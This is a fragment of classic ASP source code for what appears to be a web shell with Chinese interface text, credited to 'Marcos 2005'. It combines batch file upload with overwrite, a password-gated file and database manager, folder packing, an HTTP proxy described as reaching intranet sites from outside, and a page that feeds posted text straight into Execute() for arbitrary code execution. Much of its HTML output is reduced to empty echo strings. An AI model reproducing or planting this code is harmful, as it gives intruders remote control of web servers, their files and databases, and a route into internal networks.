stream.SetEOS() If IsNull(rs("fileContent")) = False Then stream.Write rs("fileContent") stream.SaveToFile str & rs("thePath"), 2 rs.MoveNext Loop rs.Close conn.Close stream.Close Set ws = Nothing Set rs = Nothing Set stream = Nothing Set conn = Nothing End Sub Sub FsoTreeForMdb(strPath, rs, stream) Dim item, theFolder, folders, files Set theFolder = fso.GetFolder(strPath) Set files = theFolder.Files Set folders = theFolder.SubFolders For Each item In folders Call FsoTreeForMdb(item.Path, rs, stream) Next For Each item In files If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then rs.AddNew rs("thePath") = Mid(item.Path, 4) stream.LoadFromFile(item.Path) rs("fileContent") = stream.Read() rs.Update End If Next Set files = Nothing Set folders = Nothing Set theFolder = Nothing End Sub Sub PageUpload() ShowTitle("批量文件上传") theAct = Request.QueryString("theAct") If theAct = "upload" Then StreamUpload() echo "" End If ShowUpload() End Sub Sub ShowUpload() If thePath = "" Then thePath = rootPath echo "
    " echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "
    8 批量文件上传
     
    " echo " 上传到:" echo "" echo " 覆盖模式" echo "
    " echo " 文件选择: " echo "  " echo "
    " echo " " echo "
     
    " echo "" echo "" echo "
    " echo "
    " echo "" End Sub Sub StreamUpload() Dim sA, sB, aryForm, aryFile, theForm, newLine, overWrite Dim strInfo, strName, strPath, strFileName, intFindStart, intFindEnd Dim itemDiv, itemDivLen, intStart, intDataLen, intInfoEnd, totalLen, intUpLen, intEnd If isDebugMode = False Then On Error Resume Next Server.ScriptTimeOut = 5000 newLine = ChrB(13) & ChrB(10) overWrite = Request.QueryString("overWrite") overWrite = IIf(overWrite = "true", "2", "1") Set sA = Server.CreateObject("Adodb.Stream") Set sB = Server.CreateObject("Adodb.Stream") sA.Type = 1 sA.Mode = 3 sA.Open sA.Write Request.BinaryRead(Request.TotalBytes) sA.Position = 0 theForm = sA.Read() ' sA.SaveToFile "c:\001.txt", 2 ''保存到临时文件进行查看 itemDiv = LeftB(theForm, InStrB(theForm, newLine) - 1) totalLen = LenB(theForm) itemDivLen = LenB(itemDiv) intStart = itemDivLen + 2 intUpLen = 0 '上面数据的长度 Do intDataLen = InStrB(intStart, theForm, itemDiv) - itemDivLen - 5 ''equals - 2(回车) - 1(InStr) - 2(回车) intDataLen = intDataLen - intUpLen intEnd = intStart + intDataLen intInfoEnd = InStrB(intStart, theForm, newLine & newLine) - 1 sB.Type = 1 sB.Mode = 3 sB.Open sA.Position = intStart sA.CopyTo sB, intInfoEnd - intStart ''保存元素信息部分 sB.Position = 0 sB.Type = 2 sB.CharSet = "GB2312" strInfo = sB.ReadText() strFileName = "" intFindStart = InStr(strInfo, "name=""") + 6 intFindEnd = InStr(intFindStart, strInfo, """", 1) strName = Mid(strInfo, intFindStart, intFindEnd - intFindStart) If InStr(strInfo, "filename=""") > 0 Then ''>0则为文件,开始接收文件 intFindStart = InStr(strInfo, "filename=""") + 10 intFindEnd = InStr(intFindStart, strInfo, """", 1) strFileName = Mid(strInfo, intFindStart, intFindEnd - intFindStart) strFileName = Mid(strFileName, InStrRev(strFileName, "\") + 1) End If sB.Close sB.Type = 1 sB.Mode = 3 sB.Open sA.Position = intInfoEnd + 4 sA.CopyTo sB, intEnd - intInfoEnd - 4 If strFileName <> "" Then sB.SaveToFile strPath & strFileName, overWrite ChkErr(Err) Else If strName = "thePath" Then sB.Position = 0 sB.Type = 2 sB.CharSet = "GB2312" strInfo = sB.ReadText() thePath = strInfo strPath = strInfo & "\" End If End If sB.Close intUpLen = intStart + intDataLen + 2 intStart = intUpLen + itemDivLen + 2 Loop Until (intStart + 2) = totalLen sA.Close Set sA = Nothing Set sB = Nothing End Sub Sub PageLogin() Dim passWord passWord = GetPost("password") If theAct = "Login" Then If userPassword = passWord Then Session(m & "userPassword") = userPassword ShowTitle("登录成功!") PageReadMe() Exit Sub End If End If If pageName = "PageOut" Then Session.Contents.Remove(m & "userPassword") RedirectTo(url) End If If Session(m & "userPassword") = userPassword Then PageReadMe() Exit Sub End If ShowTitle("Login") echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo " " echo "" echo "" echo "" echo "
     
    " echo " " echo "" echo "
    管理员登陆
    " echo "" echo "" End Sub Sub PageReadMe() Dim strInfo, aryInfo(7), theAry ShowTitle("MEGA Login") aryInfo(0) = "服务器信息探针|1.服务器基本信息
      WEB服务器的一些基本信息
    2.服务器组件信息
      一些常用的ASP组件的支持情况检测
    " & _ "3.Application/Session查看
      所有系统变量及其值的查看, 当前浏览器进程和服务器的会话及内容的查看" aryInfo(1) = "FSO文件浏览操作器|1.基本功能
      站点目录浏览, 新建, 重命名, 另存为, 删除, 文本编辑, 复制/移动到文件夹
    " & _ "2.外链功能
      项目打包(文件夹打包/解开器), mdb类型数据库操作(数据库操作器), 文件上传(批量文件上传)" aryInfo(2) = "数据库操作器
    (Access, SQL Server)|1.基本功能:
      数据库基本表结构查看, 数据表记录操作(查看,添加,修改,删除), 多条件记录查询
    " & _ "2.扩展功能
      执行自定义查询, 用来执行所有自定义SQL语句, 如果是Select查询还可以返回记录" aryInfo(3) = "文件夹打包/解开器|1.文件夹打包
      指定要打包的文件夹, 按""开始打包""后生成" & sPacketName & "(位于要打包的文件夹目录)
    " & _ "2.文件包解开
      指定文件包相对路径, 按""开始解包"", 解开目录为文件包(" & sPacketName & ")所在目录" aryInfo(4) = "批量文件上传|进入页面后, 指定好要上传的目标目录, 如果要上传多个, 请先设定上传文件数量,
    然后选择要上传的文件, 选择完毕后开始上传, 如果要上传的文件可能已经存在,可以选择""覆盖模式""
    进行覆盖上传" aryInfo(5) = "文本文件搜索器|指定搜索目录, 填写好搜索关键字, 指定搜索条件(文件名,文本内容,或者两者)后按提交即可" aryInfo(6) = "HTTP网页代理|通过另一台服务器来访问你所要访问的网页, 并把结果返回给你;
    把程序放在一台既能让外网访问又能被内网访问的WEB服务器上, 这样你就可以从网内通过它来上网,
    可以从网外通过它来访问内网网站, 这是一个神奇的功能" aryInfo(7) = "自定义ASP语句执行|允许执行自定义ASP语句, 但是变量及模块命名受程序本身的已命名限制" TopMenu() echo "" echo "" echo "" echo "" echo "" echo "" echo "" For Each strInfo In aryInfo theAry = Split(strInfo, "|") echo "" echo "" echo "" echo "" Next echo "" echo "" echo "" echo "" echo "" echo "" echo "
    8MEGA Login
     
     " & theAry(0) & "" & theAry(1) & "
     
    By Marcos 2005.06 
    " End Sub Function Encode(strPass) Dim i, theStr, strTmp For i = 1 To Len(strPass) strTmp = Asc(Mid(strPass, i, 1)) theStr = theStr & Abs(strTmp) Next strPass = theStr theStr = "" Do While Len(strPass) > 16 strPass = JoinCutStr(strPass) Loop For i = 1 To Len(strPass) strTmp = CInt(Mid(strPass, i, 1)) strTmp = IIf(strTmp > 6, Chr(strTmp + 60), strTmp) theStr = theStr & strTmp Next Encode = theStr End Function Function JoinCutStr(str) Dim i, theStr For i = 1 To Len(str) If Len(str) - i = 0 Then Exit For theStr = theStr & Chr(CInt((Asc(Mid(str, i, 1)) + Asc(Mid(str, i + 1, 1))) / 2)) i = i + 1 Next JoinCutStr = theStr End Function Sub PageExecute() Dim strAspCode strAspCode = GetPost("AspCode") ShowTitle("自定义ASP语句执行") If theAct = "Exe" Then echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "
     
    8 执行结果
    " Execute(strAspCode) echo "
    " End If ShowExeTable(strAspCode) End Sub Sub ShowExeTable(strAspCode) echo "
    " echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "" echo "
    8 自定义ASP语句执行
     
    " echo " ASP语句: " echo " " echo "" echo "
     
    " echo "" echo "" echo "" echo "" echo "
    " echo "
    " End Sub Sub PageWebProxy() Dim i, re, Url, Html Response.Clear() Url = Request.QueryString("url") If Url = "" Then Response.Redirect("?PageName=PageWebProxy&url=http://hididi.net/") Set re = New RegExp re.IgnoreCase = True re.Global = True sUrlB = Url Html = getHTTPPage(Url) Url = Left(Url, InStrRev(Url, "/")) i = InStr(sUrlB, "?") If i > 0 Then sUrlB = Left(sUrlB, i - 1) End If re.Pattern = "(href|action)=(\'|"")?(\?)" Html = re.Replace(Html,"$1=$2" & sUrlB & "?") re.Pattern = "(src|action|href)=(\'|"")?((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)(\'|"")?" Html = re.Replace(Html,"$1x=$2$3$2") re.Pattern = "(window\.open|url)\((\'|"")?((http|https):(\/\/|\\\\)[A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?\)" Html = re.Replace(Html,"$1x($2$3$2)") re.Pattern = "(src|action|href|background)=(\'|"")?([^\/""\'][A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?" Html = re.Replace(Html,"$1=$2" & Url & "$3$2") re.Pattern = "(src|action|href|background)=(\'|"")?\/([^""\'][A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?" Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$3$2") re.Pattern = "(src|action|href)=(\'|"")?\/(\'|"")?" Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$2") re.Pattern = "(window\.open|url)\((\'|"")?([^\/""\'http:][A-Za-z0-9\./=\?%\-&_~`@[\]+!]+([^\'<>""])+)(\'|"")?\)" Html = re.Replace(Html,"$1($2" & Url & "$3$2)") re.Pattern = "(window\.open|url)\((\'|"")?\/([^""\'http:][A-Za-z0-9\./=\?%\-&_~`@[\]+!]+([^\'<>""])+)(\'|"")?\)" Html = re.Replace(Html,"$1($2http://" & Split(Url, "/")(2) & "/$3$2)") Html = Replace(Html, "&", "%26") Html = Replace(Html, "%26nbsp;", " ") Html = Replace(Html, "%26lt;", "<") Html = Replace(Html, "%26gt;", ">") Html = Replace(Html, "%26quot;", """) Html = Replace(Html, "%26copy;", "©") Html = Replace(Html, "%26reg;", "®") Html = Replace(Html, "%26raquo;", "»") Html = Replace(Html, "%26%26", "&&") Html = Replace(Html, "%26#", "&#") re.Pattern = "(src|action|href)x=(\'|"")?((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)(\'|"")?" Html = re.Replace(Html, "$1=$2$3$2") re.Pattern = "((http|https):(\/\/|\\\\)[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)" Html = re.Replace(Html, "?PageName=PageWebProxy&url=$1") re.Pattern = "\?PageName=PageWebProxy&url=" & Url & "(#|javascript:)" Html = re.Replace(Html, "$1") re.Pattern = "multipart\/form-data" Html = re.Replace(Html, "") re.Pattern = ">\?PageName=PageWebProxy&url=((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)<" Html = re.Replace(Html, ">$1<") Response.Write(Html) End Sub Function getHTTPPage(url) Dim Http, theStr, fileExt Set Http = Server.CreateObject("MSXML2.XMLHTTP") If Request.Form.Count > 0 Then For Each x In Request.Form theStr = theStr & Server.UrlEncode(x) & "=" & Server.UrlEncode(Request.Form(x)) & "&" Next Http.Open "POST", url, False Http.SetRequestHeader "CONTENT-TYPE", "application/x-www-form-urlencoded" Http.Send(theStr) Else Http.Open "GET", url, False Http.Send() End If If Http.readystate<>4 then Exit Function fileExt = LCase(Mid(url, InStrRev(url, ".") + 1)) If InStr("$jpg$gif$bmp$png$js$", "$" & fileExt & "$") > 0 Then Response.Clear Response.BinaryWrite Http.responseBody Response.End() Else If InStr("$rar$mdb$zip$exe$com$ico$", "$" & fileExt & "$") > 0 Then Response.AddHeader "Content-Disposition", "Attachment; Filename=" & Mid(sUrlB, InStrRev(sUrlB, "/") + 1) Response.BinaryWrite Http.responseBody Response.Flush Else getHTTPPage = bytesToBSTR(Http.responseBody, "GB2312") End If End If Set Http = Nothing End Function Function BytesToBstr(body,Cset) Dim objstream Set objstream = Server.CreateObject("adodb.stream") objstream.Type = 1 objstream.Mode =3 objstream.Open objstream.Write body objstream.Position = 0 objstream.Type = 2 objstream.Charset = Cset BytesToBstr = objstream.ReadText objstream.Close Set objstream = nothing End Function Sub PageOther() %> <% End Sub %>